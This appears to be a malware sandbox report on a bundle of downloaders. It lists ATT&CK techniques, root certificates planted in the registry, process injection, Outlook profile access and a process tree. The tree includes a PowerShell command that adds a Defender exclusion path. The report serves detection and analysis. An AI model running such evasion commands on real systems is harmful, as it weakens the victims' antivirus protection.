Modifies system certificate store 2 TTPs 6 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A	procexp64.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 0f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6500b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b060105050703016200000001000000200000001465fa205397b876faa6f0a9958e5590e40fcc7faa4fb7c2c8677521fb5fb658140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e71d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a2000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794	procexp64.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 190000000100000010000000fd960962ac6938e0d4b0769aa1a64e26030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a1d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e76200000001000000200000001465fa205397b876faa6f0a9958e5590e40fcc7faa4fb7c2c8677521fb5fb65809000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030153000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f00720069007400790000000f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6502000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794	procexp64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\02FAF3E291435468607857694DF5E45B68851868	procexp64.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\02FAF3E291435468607857694DF5E45B68851868\Blob = 0f000000010000001400000009b9105c5bba24343ca7f341c624e183f6ee7c1b090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b00000001000000260000005300650063007400690067006f00200028004100640064005400720075007300740029000000620000000100000020000000687fa451382278fff0c8b11f8d43d576671c6eb2bceab413fb83d965d06d2ff2140000000100000014000000adbd987a34b426f7fac42654ef03bde024cb541a1d000000010000001000000006f9583c00a763c23fb9e065a3366d557e0000000100000008000000000063f58926d70168000000010000000800000000409120d035d90103000000010000001400000002faf3e291435468607857694df5e45b6885186820000000010000003a040000308204363082031ea003020102020101300d06092a864886f70d0101050500306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f74301e170d3030303533303130343833385a170d3230303533303130343833385a306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100b7f71a33e6f200042d39e04e5bed1fbc6c0fcdb5fa23b6cede9b113397a4294c7d939fbd4abc93ed031ae38fcfe56d505ad69729945a80b0497adb2e95fdb8cabf37382d1e3e9141ad7056c7f04f3fe8329e74cac89054e9c65f0f789d9a403c0eac61aa5e148f9e87a16a50dcd79a4eaf05b3a671949c71b350600ac7139d38078602a8e9a869261890ab4cb04f23ab3a4f84d8dfce9fe1696fbbd742d76b44e4c7adee6d415f725a710837b37965a459a09437f7002f0dc29272dad03872db14a845c45d2a7db7b4d6c4eeaccd1344b7c92bdd430025fa61b9696a582311b7a7338f567559f5cd29d746b70a2b65b6d3426f15b2b87bfbefe95d53d5345a270203010001a381dc3081d9301d0603551d0e04160414adbd987a34b426f7fac42654ef03bde024cb541a300b0603551d0f040403020106300f0603551d130101ff040530030101ff3081990603551d2304819130818e8014adbd987a34b426f7fac42654ef03bde024cb541aa173a471306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f74820101300d06092a864886f70d01010505000382010100b09be08525c2d623e20f9606929d41989cd9847981d91e5b14072336658fb0d877bbac416c47608351b0f9323de7fcf62613c78016a5bf5afc87cf787989219ae24c070a8635bcf2de51c4d296b7dc7e4eee70fd1c39eb0c0251142d8ebd16e0c1df4675e724adecf442b48593701067ba9d06354a18d32b7acc5142a17a63d1e6bba1c52bc236be130de6bd637e797ba7090d40ab6add8f8ac3f6f68c1a420551d445f59fa76221681520433c99e77cbd24d8a9911773883f561b313818b4710f9acdc80e9e8e2e1be18c9883cb1f31f1444cc604734976600fc7f8bd17806b2ee9cc4c0e5a9a790f200a2ed59e63261e559294d882175a7bd0bcc78f4e8604	procexp64.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\02FAF3E291435468607857694DF5E45B68851868\Blob = 19000000010000001000000045ed9bbc5e43d3b9ecd63c060db78e5c03000000010000001400000002faf3e291435468607857694df5e45b6885186868000000010000000800000000409120d035d9017e0000000100000008000000000063f58926d7011d000000010000001000000006f9583c00a763c23fb9e065a3366d55140000000100000014000000adbd987a34b426f7fac42654ef03bde024cb541a620000000100000020000000687fa451382278fff0c8b11f8d43d576671c6eb2bceab413fb83d965d06d2ff20b00000001000000260000005300650063007400690067006f0020002800410064006400540072007500730074002900000053000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f000000010000001400000009b9105c5bba24343ca7f341c624e183f6ee7c1b20000000010000003a040000308204363082031ea003020102020101300d06092a864886f70d0101050500306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f74301e170d3030303533303130343833385a170d3230303533303130343833385a306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100b7f71a33e6f200042d39e04e5bed1fbc6c0fcdb5fa23b6cede9b113397a4294c7d939fbd4abc93ed031ae38fcfe56d505ad69729945a80b0497adb2e95fdb8cabf37382d1e3e9141ad7056c7f04f3fe8329e74cac89054e9c65f0f789d9a403c0eac61aa5e148f9e87a16a50dcd79a4eaf05b3a671949c71b350600ac7139d38078602a8e9a869261890ab4cb04f23ab3a4f84d8dfce9fe1696fbbd742d76b44e4c7adee6d415f725a710837b37965a459a09437f7002f0dc29272dad03872db14a845c45d2a7db7b4d6c4eeaccd1344b7c92bdd430025fa61b9696a582311b7a7338f567559f5cd29d746b70a2b65b6d3426f15b2b87bfbefe95d53d5345a270203010001a381dc3081d9301d0603551d0e04160414adbd987a34b426f7fac42654ef03bde024cb541a300b0603551d0f040403020106300f0603551d130101ff040530030101ff3081990603551d2304819130818e8014adbd987a34b426f7fac42654ef03bde024cb541aa173a471306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f74820101300d06092a864886f70d01010505000382010100b09be08525c2d623e20f9606929d41989cd9847981d91e5b14072336658fb0d877bbac416c47608351b0f9323de7fcf62613c78016a5bf5afc87cf787989219ae24c070a8635bcf2de51c4d296b7dc7e4eee70fd1c39eb0c0251142d8ebd16e0c1df4675e724adecf442b48593701067ba9d06354a18d32b7acc5142a17a63d1e6bba1c52bc236be130de6bd637e797ba7090d40ab6add8f8ac3f6f68c1a420551d445f59fa76221681520433c99e77cbd24d8a9911773883f561b313818b4710f9acdc80e9e8e2e1be18c9883cb1f31f1444cc604734976600fc7f8bd17806b2ee9cc4c0e5a9a790f200a2ed59e63261e559294d882175a7bd0bcc78f4e8604	procexp64.exe

Runs net.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
4884	PING.EXE

Suspicious behavior: AddClipboardFormatListener 2 IoCs

pid	Process
3580	Explorer.EXE
3580	Explorer.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1916	procexp64.exe
1916	procexp64.exe
1916	procexp64.exe
1916	procexp64.exe
1916	procexp64.exe
1916	procexp64.exe
1916	procexp64.exe
1916	procexp64.exe
1916	procexp64.exe
1916	procexp64.exe
1916	procexp64.exe
1916	procexp64.exe
1916	procexp64.exe
1916	procexp64.exe
1916	procexp64.exe
1916	procexp64.exe
1916	procexp64.exe
1916	procexp64.exe
1916	procexp64.exe
5148	powershell.exe
5148	powershell.exe
5148	powershell.exe
5992	hjv.exe
5992	hjv.exe
5992	hjv.exe
5992	hjv.exe
1784	hjv.exe
1784	hjv.exe
1784	hjv.exe
2188	HJCL.exe
2188	HJCL.exe
2188	HJCL.exe
4220	powershell.exe
4220	powershell.exe
4220	powershell.exe
3680	HJCL.exe
3680	HJCL.exe
3396	HJCL.exe
3396	HJCL.exe
3396	HJCL.exe
3396	HJCL.exe
5188	hjv.exe
5188	hjv.exe
5212	HJCL.exe
5212	HJCL.exe
5188	hjv.exe
5188	hjv.exe
5188	hjv.exe
4308	hjv.exe
4308	hjv.exe
4308	hjv.exe
5196	powershell.exe
5196	powershell.exe
5212	HJCL.exe
5196	powershell.exe
5400	powershell.exe
5400	powershell.exe
5400	powershell.exe
4308	hjv.exe
5132	procexp64.exe
5132	procexp64.exe
5132	procexp64.exe
5132	procexp64.exe
5132	procexp64.exe

Suspicious behavior: GetForegroundWindowSpam 3 IoCs

pid	Process
3580	Explorer.EXE
956	dControl.exe
2164	HJCL.exe

Suspicious behavior: LoadsDriver 2 IoCs

pid	Process
1916	procexp64.exe
5132	procexp64.exe

Suspicious behavior: MapViewOfSection 10 IoCs

pid	Process
2164	HJCL.exe
2164	HJCL.exe
2164	HJCL.exe
2164	HJCL.exe
2164	HJCL.exe
5660	html.exe
5660	html.exe
5660	html.exe
5572	systray.exe
5572	systray.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeRestorePrivilege	4032	7zG.exe
Token: 35	4032	7zG.exe
Token: SeSecurityPrivilege	4032	7zG.exe
Token: SeSecurityPrivilege	4032	7zG.exe
Token: SeRestorePrivilege	4728	7zG.exe
Token: 35	4728	7zG.exe
Token: SeSecurityPrivilege	4728	7zG.exe
Token: SeSecurityPrivilege	4728	7zG.exe
Token: SeDebugPrivilege	2896	4363463463464363463463463.exe
Token: SeRestorePrivilege	1776	7zG.exe
Token: 35	1776	7zG.exe
Token: SeSecurityPrivilege	1776	7zG.exe
Token: SeSecurityPrivilege	1776	7zG.exe
Token: SeDebugPrivilege	3064	New Text Document mod.exe
Token: SeDebugPrivilege	1916	procexp64.exe
Token: SeBackupPrivilege	1916	procexp64.exe
Token: SeSecurityPrivilege	1916	procexp64.exe
Token: SeLoadDriverPrivilege	1916	procexp64.exe
Token: SeShutdownPrivilege	1916	procexp64.exe
Token: SeCreatePagefilePrivilege	1916	procexp64.exe
Token: SeShutdownPrivilege	1916	procexp64.exe
Token: SeCreatePagefilePrivilege	1916	procexp64.exe
Token: SeDebugPrivilege	1916	procexp64.exe
Token: SeImpersonatePrivilege	1916	procexp64.exe
Token: SeSecurityPrivilege	1916	procexp64.exe
Token: SeDebugPrivilege	1916	procexp64.exe
Token: SeBackupPrivilege	1916	procexp64.exe
Token: SeRestorePrivilege	1916	procexp64.exe
Token: SeDebugPrivilege	1916	procexp64.exe
Token: SeDebugPrivilege	3276	TJeAjWEEeH.exe
Token: SeDebugPrivilege	5148	powershell.exe
Token: SeDebugPrivilege	5992	hjv.exe
Token: SeDebugPrivilege	5316	Client-built.exe
Token: SeDebugPrivilege	1784	hjv.exe
Token: SeDebugPrivilege	2408	Client.exe
Token: SeDebugPrivilege	5180	crypted.exe
Token: SeDebugPrivilege	2188	HJCL.exe
Token: SeDebugPrivilege	4220	powershell.exe
Token: SeDebugPrivilege	3680	HJCL.exe
Token: SeDebugPrivilege	5188	hjv.exe
Token: SeDebugPrivilege	4944	New Text Document mod.exe
Token: SeDebugPrivilege	5212	HJCL.exe
Token: SeDebugPrivilege	4308	hjv.exe
Token: SeDebugPrivilege	5196	powershell.exe
Token: SeDebugPrivilege	5400	powershell.exe
Token: SeDebugPrivilege	5132	procexp64.exe
Token: SeBackupPrivilege	5132	procexp64.exe
Token: SeSecurityPrivilege	5132	procexp64.exe
Token: SeLoadDriverPrivilege	5132	procexp64.exe
Token: SeShutdownPrivilege	5132	procexp64.exe
Token: SeCreatePagefilePrivilege	5132	procexp64.exe
Token: SeShutdownPrivilege	5132	procexp64.exe
Token: SeCreatePagefilePrivilege	5132	procexp64.exe
Token: SeDebugPrivilege	1140	crypted.exe
Token: SeDebugPrivilege	5132	procexp64.exe
Token: SeImpersonatePrivilege	5132	procexp64.exe
Token: SeSecurityPrivilege	5132	procexp64.exe
Token: SeDebugPrivilege	5132	procexp64.exe
Token: SeBackupPrivilege	5132	procexp64.exe
Token: SeRestorePrivilege	5132	procexp64.exe
Token: SeDebugPrivilege	5132	procexp64.exe
Token: SeDebugPrivilege	3148	Client-built.exe
Token: SeDebugPrivilege	5660	html.exe
Token: SeShutdownPrivilege	3580	Explorer.EXE

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
4032	7zG.exe
4728	7zG.exe
1776	7zG.exe
1916	procexp64.exe
1916	procexp64.exe
1916	procexp64.exe
1916	procexp64.exe
1916	procexp64.exe
1916	procexp64.exe
1916	procexp64.exe
1916	procexp64.exe
1916	procexp64.exe
1916	procexp64.exe
1916	procexp64.exe
1916	procexp64.exe
1916	procexp64.exe
1916	procexp64.exe
1916	procexp64.exe
1916	procexp64.exe
1916	procexp64.exe
1916	procexp64.exe
5132	procexp64.exe
5132	procexp64.exe
5132	procexp64.exe
5132	procexp64.exe
5132	procexp64.exe
5132	procexp64.exe
5132	procexp64.exe
5132	procexp64.exe
5132	procexp64.exe
5132	procexp64.exe
5132	procexp64.exe
5132	procexp64.exe
5132	procexp64.exe
5132	procexp64.exe
5132	procexp64.exe
5132	procexp64.exe
5132	procexp64.exe
5132	procexp64.exe
5132	procexp64.exe
5132	procexp64.exe
5132	procexp64.exe
5132	procexp64.exe
5132	procexp64.exe
5132	procexp64.exe
3580	Explorer.EXE
3580	Explorer.EXE
5132	procexp64.exe
5132	procexp64.exe
5132	procexp64.exe
5132	procexp64.exe
5132	procexp64.exe
5132	procexp64.exe
956	dControl.exe
3580	Explorer.EXE
3580	Explorer.EXE
956	dControl.exe
956	dControl.exe
956	dControl.exe
956	dControl.exe
956	dControl.exe
956	dControl.exe
956	dControl.exe
956	dControl.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
1916	procexp64.exe
1916	procexp64.exe
1916	procexp64.exe
1916	procexp64.exe
1916	procexp64.exe
1916	procexp64.exe
1916	procexp64.exe
1916	procexp64.exe
1916	procexp64.exe
1916	procexp64.exe
1916	procexp64.exe
1916	procexp64.exe
1916	procexp64.exe
1916	procexp64.exe
1916	procexp64.exe
1916	procexp64.exe
1916	procexp64.exe
1916	procexp64.exe
5132	procexp64.exe
5132	procexp64.exe
5132	procexp64.exe
5132	procexp64.exe
5132	procexp64.exe
5132	procexp64.exe
5132	procexp64.exe
5132	procexp64.exe
5132	procexp64.exe
5132	procexp64.exe
5132	procexp64.exe
5132	procexp64.exe
5132	procexp64.exe
5132	procexp64.exe
5132	procexp64.exe
5132	procexp64.exe
5132	procexp64.exe
5132	procexp64.exe
5132	procexp64.exe
5132	procexp64.exe
5132	procexp64.exe
5132	procexp64.exe
5132	procexp64.exe
5132	procexp64.exe
5132	procexp64.exe
5132	procexp64.exe
5132	procexp64.exe
5132	procexp64.exe
5132	procexp64.exe
5132	procexp64.exe
956	dControl.exe
956	dControl.exe
956	dControl.exe
956	dControl.exe
956	dControl.exe
956	dControl.exe
956	dControl.exe
956	dControl.exe
956	dControl.exe
956	dControl.exe
956	dControl.exe
956	dControl.exe
956	dControl.exe
956	dControl.exe
956	dControl.exe
956	dControl.exe

Suspicious use of SetWindowsHookEx 20 IoCs

pid	Process
5684	svcyr.exe
1916	procexp64.exe
2924	OpenWith.exe
2408	Client.exe
3572	RegAsm.exe
4680	svcyr.exe
2164	HJCL.exe
4348	lomik.exe
3580	Explorer.EXE
3580	Explorer.EXE
1028	dControl.exe
5388	dControl.exe
1844	cp.exe
3320	140.exe
3580	Explorer.EXE
3580	Explorer.EXE
4316	RegAsm.exe
3580	Explorer.EXE
3580	Explorer.EXE
5544	pei.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2896 wrote to memory of 5684	2896	4363463463464363463463463.exe	108
PID 2896 wrote to memory of 5684	2896	4363463463464363463463463.exe	108
PID 2896 wrote to memory of 5684	2896	4363463463464363463463463.exe	108
PID 2896 wrote to memory of 1916	2896	4363463463464363463463463.exe	110
PID 2896 wrote to memory of 1916	2896	4363463463464363463463463.exe	110
PID 3064 wrote to memory of 408	3064	New Text Document mod.exe	115
PID 3064 wrote to memory of 408	3064	New Text Document mod.exe	115
PID 3064 wrote to memory of 408	3064	New Text Document mod.exe	115
PID 3064 wrote to memory of 5992	3064	New Text Document mod.exe	116
PID 3064 wrote to memory of 5992	3064	New Text Document mod.exe	116
PID 3064 wrote to memory of 5992	3064	New Text Document mod.exe	116
PID 2896 wrote to memory of 3276	2896	4363463463464363463463463.exe	120
PID 2896 wrote to memory of 3276	2896	4363463463464363463463463.exe	120
PID 3276 wrote to memory of 5148	3276	TJeAjWEEeH.exe	121
PID 3276 wrote to memory of 5148	3276	TJeAjWEEeH.exe	121
PID 2896 wrote to memory of 5316	2896	4363463463464363463463463.exe	123
PID 2896 wrote to memory of 5316	2896	4363463463464363463463463.exe	123
PID 5316 wrote to memory of 5444	5316	Client-built.exe	125
PID 5316 wrote to memory of 5444	5316	Client-built.exe	125
PID 3064 wrote to memory of 2188	3064	New Text Document mod.exe	127
PID 3064 wrote to memory of 2188	3064	New Text Document mod.exe	127
PID 3064 wrote to memory of 2188	3064	New Text Document mod.exe	127
PID 5992 wrote to memory of 1784	5992	hjv.exe	128
PID 5992 wrote to memory of 1784	5992	hjv.exe	128
PID 5992 wrote to memory of 1784	5992	hjv.exe	128
PID 5992 wrote to memory of 1784	5992	hjv.exe	128
PID 5992 wrote to memory of 1784	5992	hjv.exe	128
PID 5992 wrote to memory of 1784	5992	hjv.exe	128
PID 5992 wrote to memory of 1784	5992	hjv.exe	128
PID 5992 wrote to memory of 1784	5992	hjv.exe	128
PID 5316 wrote to memory of 2408	5316	Client-built.exe	129
PID 5316 wrote to memory of 2408	5316	Client-built.exe	129
PID 2408 wrote to memory of 5676	2408	Client.exe	130
PID 2408 wrote to memory of 5676	2408	Client.exe	130
PID 2896 wrote to memory of 5180	2896	4363463463464363463463463.exe	132
PID 2896 wrote to memory of 5180	2896	4363463463464363463463463.exe	132
PID 2896 wrote to memory of 5180	2896	4363463463464363463463463.exe	132
PID 5180 wrote to memory of 916	5180	crypted.exe	133
PID 5180 wrote to memory of 916	5180	crypted.exe	133
PID 5180 wrote to memory of 916	5180	crypted.exe	133
PID 5180 wrote to memory of 4612	5180	crypted.exe	134
PID 5180 wrote to memory of 4612	5180	crypted.exe	134
PID 5180 wrote to memory of 4612	5180	crypted.exe	134
PID 5180 wrote to memory of 3732	5180	crypted.exe	135
PID 5180 wrote to memory of 3732	5180	crypted.exe	135
PID 5180 wrote to memory of 3732	5180	crypted.exe	135
PID 5180 wrote to memory of 3640	5180	crypted.exe	136
PID 5180 wrote to memory of 3640	5180	crypted.exe	136
PID 5180 wrote to memory of 3640	5180	crypted.exe	136
PID 5180 wrote to memory of 3572	5180	crypted.exe	137
PID 5180 wrote to memory of 3572	5180	crypted.exe	137
PID 5180 wrote to memory of 3572	5180	crypted.exe	137
PID 5180 wrote to memory of 3572	5180	crypted.exe	137
PID 5180 wrote to memory of 3572	5180	crypted.exe	137
PID 5180 wrote to memory of 3572	5180	crypted.exe	137
PID 5180 wrote to memory of 3572	5180	crypted.exe	137
PID 5180 wrote to memory of 3572	5180	crypted.exe	137
PID 5180 wrote to memory of 3572	5180	crypted.exe	137
PID 5180 wrote to memory of 3572	5180	crypted.exe	137
PID 2896 wrote to memory of 4680	2896	4363463463464363463463463.exe	138
PID 2896 wrote to memory of 4680	2896	4363463463464363463463463.exe	138
PID 2896 wrote to memory of 4680	2896	4363463463464363463463463.exe	138
PID 2188 wrote to memory of 4220	2188	HJCL.exe	139
PID 2188 wrote to memory of 4220	2188	HJCL.exe	139

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
8716	attrib.exe

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	lomik.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	lomik.exe

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:3580
- C:\Windows\Explorer.exe
  C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\Downloaders.zip
  2⤵
  PID:4600
- C:\Program Files\7-Zip\7zG.exe
  "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Desktop\" -an -ai#7zMap20869:80:7zEvent11629
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  PID:4032
- C:\Program Files\7-Zip\7zG.exe
  "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Desktop\" -an -ai#7zMap1927:108:7zEvent5629
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  PID:4728
- C:\Users\Admin\Desktop\4363463463464363463463463.exe
  "C:\Users\Admin\Desktop\4363463463464363463463463.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2896
- - C:\Users\Admin\Desktop\Files\svcyr.exe
    "C:\Users\Admin\Desktop\Files\svcyr.exe"
    3⤵
    - Executes dropped EXE
    - Drops file in Windows directory
    - Suspicious use of SetWindowsHookEx
    PID:5684
- - C:\Users\Admin\Desktop\Files\procexp64.exe
    "C:\Users\Admin\Desktop\Files\procexp64.exe"
    3⤵
    - Drops file in Drivers directory
    - Sets service image path in registry
    - Executes dropped EXE
    - Enumerates connected drives
    - Checks system information in the registry
    - Checks SCSI registry key(s)
    - Checks processor information in registry
    - Modifies system certificate store
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: LoadsDriver
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of SetWindowsHookEx
    PID:1916
- - C:\Users\Admin\Desktop\Files\TJeAjWEEeH.exe
    "C:\Users\Admin\Desktop\Files\TJeAjWEEeH.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3276
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
